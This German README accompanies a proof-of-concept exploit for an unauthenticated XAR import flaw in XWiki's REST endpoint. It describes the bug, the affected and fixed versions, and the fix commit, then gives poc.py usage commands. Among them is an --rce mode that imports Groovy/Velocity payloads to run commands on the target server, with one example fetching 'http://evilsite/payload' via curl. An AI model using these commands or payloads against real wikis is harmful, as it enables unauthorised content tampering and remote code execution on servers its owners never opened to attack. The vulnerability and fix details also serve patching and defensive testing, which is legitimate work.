
XWiki Platform - CVE-2026-33137 PoC - Nicht authentifizierter XAR-Import über REST /wikis/{wikiName}
XWiki Platform – Nicht authentifizierter XAR-Import via REST /wikis/{wikiName}
Der REST-API-Endpunkt POST /wikis/{wikiName} in der XWiki-Plattform führt einen XAR-Import (XWiki-Archiv) durch, ohne dabei eine Authentifizierungs- oder Autorisierungsprüfung vorzunehmen. Ein nicht authentifizierter Angreifer kann durch das Senden einer manipulierten XAR-Datei beliebige Dokumente im Ziel-Wiki erstellen oder aktualisieren.
AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N| Status | Versionen |
|---|
| Anfällig | > 15.10.16, > 16.4.6, > 16.10.2 |
| Behoben | 16.10.17, 17.4.9, 17.10.3, 18.0.1, 18.1.0-rc-1 |
Ein nicht authentifizierter Angreifer kann:
Der REST-Endpunkt POST /xwiki/rest/wikis/{wikiName} akzeptiert im Anfragetext eine XAR-Datei und importiert diese direkt in das Wiki, ohne zu prüfen, ob der Anfragende ADMIN-Rechte besitzt. Der Fix (Commit 4b7b95b) fügt eine Autorisierungsprüfung mittels ContextualAuthorizationManager.checkAccess(Right.ADMIN, ...) hinzu.
# Install requirements
pip install requests
# Basic usage
python poc.py -t http://target:8080
# Specify wiki, space, and page names
python poc.py -t http://target:8080 -w xwiki -s MySpace -p MyPage
# Probe the target first
python poc.py -t http://target:8080 --probe
# Use a proxy (e.g., Burp Suite)
python poc.py -t http://target:8080 --proxy http://127.0.0.1:8080
# Custom content
python poc.py -t http://target:8080 -c "Proof of Concept"
# RCE mode: execute a command on the target server
python poc.py -t http://target:8080 --rce "id"
# RCE with authenticated triggering (if credentials are available)
python poc.py -t http://target:8080 --rce "curl http://evilsite/payload" -u admin --password pass
--rce)Das Flag --rce importiert Seiten, die Groovy- und Velocity-Payloads enthalten und die angegebene Befehlszeichenkette ausführen. Es führt automatisch Folgendes durch:
{{groovy}} und {{velocity}}Voraussetzungen für eine erfolgreiche RCE:
-u/--password bereitgestellt)package.xml – Paketbeschreibung{Space}/{Page}.xml – Dokument-XML mit InhaltDieser PoC dient ausschließlich zu Bildungszwecken und für autorisierte Sicherheitstests. Die unbefugte Nutzung dieses Exploits gegen Systeme, die Sie nicht besitzen oder für die Sie keine ausdrückliche Testgenehmigung haben, ist illegal. Der Autor übernimmt keine Verantwortung für Missbrauch oder Schäden, die durch diese Software verursacht werden.